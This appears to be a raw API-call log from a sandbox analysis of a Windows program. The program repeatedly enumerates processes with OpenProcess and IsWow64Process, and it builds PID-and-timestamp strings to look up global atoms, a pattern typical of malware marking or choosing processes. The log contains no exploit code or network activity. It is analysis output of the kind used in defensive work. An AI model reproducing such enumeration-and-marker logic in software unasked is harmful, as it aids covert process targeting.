	[0078.172] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.172] CloseHandle (hObject=0x224) returned 1
	[0078.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.173] CloseHandle (hObject=0x224) returned 1
	[0078.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.173] CloseHandle (hObject=0x224) returned 1
	[0078.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.173] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.173] CloseHandle (hObject=0x224) returned 1
	[0078.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.181] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.181] CloseHandle (hObject=0x224) returned 1
	[0078.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.181] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.181] CloseHandle (hObject=0x224) returned 1
	[0078.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.182] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.182] CloseHandle (hObject=0x224) returned 1
	[0078.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.182] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.182] CloseHandle (hObject=0x224) returned 1
	[0078.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.182] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.182] CloseHandle (hObject=0x224) returned 1
	[0078.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.182] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.182] CloseHandle (hObject=0x224) returned 1
	[0078.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.182] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.182] CloseHandle (hObject=0x224) returned 1
	[0078.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.183] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.183] CloseHandle (hObject=0x224) returned 1
	[0078.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.183] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.183] CloseHandle (hObject=0x224) returned 1
	[0078.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.183] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.183] CloseHandle (hObject=0x224) returned 1
	[0078.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.183] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.183] CloseHandle (hObject=0x224) returned 1
	[0078.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.183] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.183] CloseHandle (hObject=0x224) returned 1
	[0078.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.183] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.183] CloseHandle (hObject=0x224) returned 1
	[0078.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.184] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.184] CloseHandle (hObject=0x224) returned 1
	[0078.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.184] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.184] CloseHandle (hObject=0x224) returned 1
	[0078.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.184] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.184] CloseHandle (hObject=0x224) returned 1
	[0078.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.184] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.184] CloseHandle (hObject=0x224) returned 1
	[0078.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.184] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.184] CloseHandle (hObject=0x224) returned 1
	[0078.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.185] CloseHandle (hObject=0x224) returned 1
	[0078.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.185] CloseHandle (hObject=0x224) returned 1
	[0078.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.185] CloseHandle (hObject=0x224) returned 1
	[0078.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.185] CloseHandle (hObject=0x224) returned 1
	[0078.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.185] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.186] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.186] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.186] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.186] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.186] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.186] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.186] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.186] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.186] CloseHandle (hObject=0x224) returned 1
	[0078.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.187] CloseHandle (hObject=0x224) returned 1
	[0078.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.187] CloseHandle (hObject=0x224) returned 1
	[0078.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.281] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.281] CloseHandle (hObject=0x224) returned 1
	[0078.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.281] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.281] CloseHandle (hObject=0x224) returned 1
	[0078.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.281] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.281] CloseHandle (hObject=0x224) returned 1
	[0078.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.281] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.281] CloseHandle (hObject=0x224) returned 1
	[0078.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.282] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.282] CloseHandle (hObject=0x224) returned 1
	[0078.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.282] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.282] CloseHandle (hObject=0x224) returned 1
	[0078.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.282] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.282] CloseHandle (hObject=0x224) returned 1
	[0078.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.282] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.282] CloseHandle (hObject=0x224) returned 1
	[0078.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.282] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.282] CloseHandle (hObject=0x224) returned 1
	[0078.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.282] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.282] CloseHandle (hObject=0x224) returned 1
	[0078.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.282] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.283] CloseHandle (hObject=0x224) returned 1
	[0078.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.283] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.283] CloseHandle (hObject=0x224) returned 1
	[0078.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.283] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.283] CloseHandle (hObject=0x224) returned 1
	[0078.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.283] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.283] CloseHandle (hObject=0x224) returned 1
	[0078.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.283] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.283] CloseHandle (hObject=0x224) returned 1
	[0078.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.283] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.283] CloseHandle (hObject=0x224) returned 1
	[0078.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.283] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.283] CloseHandle (hObject=0x224) returned 1
	[0078.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.284] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.284] CloseHandle (hObject=0x224) returned 1
	[0078.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.284] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.284] CloseHandle (hObject=0x224) returned 1
	[0078.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.284] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.284] CloseHandle (hObject=0x224) returned 1
	[0078.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.284] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.284] CloseHandle (hObject=0x224) returned 1
	[0078.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.284] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.284] CloseHandle (hObject=0x224) returned 1
	[0078.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.284] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.284] CloseHandle (hObject=0x224) returned 1
	[0078.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.284] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.284] CloseHandle (hObject=0x224) returned 1
	[0078.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.285] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.285] CloseHandle (hObject=0x224) returned 1
	[0078.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.285] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.285] CloseHandle (hObject=0x224) returned 1
	[0078.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.285] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.285] CloseHandle (hObject=0x224) returned 1
	[0078.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.285] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.285] CloseHandle (hObject=0x224) returned 1
	[0078.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.285] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.285] CloseHandle (hObject=0x224) returned 1
	[0078.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.285] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.285] CloseHandle (hObject=0x224) returned 1
	[0078.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.286] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.286] CloseHandle (hObject=0x224) returned 1
	[0078.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.286] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.286] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.286] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.286] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.286] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.286] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.287] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.287] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.287] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.287] CloseHandle (hObject=0x224) returned 1
	[0078.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.287] CloseHandle (hObject=0x224) returned 1
	[0078.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.287] CloseHandle (hObject=0x224) returned 1
	[0078.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.368] CloseHandle (hObject=0x224) returned 1
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.368] CloseHandle (hObject=0x224) returned 1
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.368] CloseHandle (hObject=0x224) returned 1
	[0078.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.369] CloseHandle (hObject=0x224) returned 1
	[0078.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.369] CloseHandle (hObject=0x224) returned 1
	[0078.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.369] CloseHandle (hObject=0x224) returned 1
	[0078.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.369] CloseHandle (hObject=0x224) returned 1
	[0078.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.369] CloseHandle (hObject=0x224) returned 1
	[0078.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.370] CloseHandle (hObject=0x224) returned 1
	[0078.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.370] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.370] CloseHandle (hObject=0x224) returned 1
	[0078.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.370] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.370] CloseHandle (hObject=0x224) returned 1
	[0078.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.370] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.370] CloseHandle (hObject=0x224) returned 1
	[0078.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.370] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.370] CloseHandle (hObject=0x224) returned 1
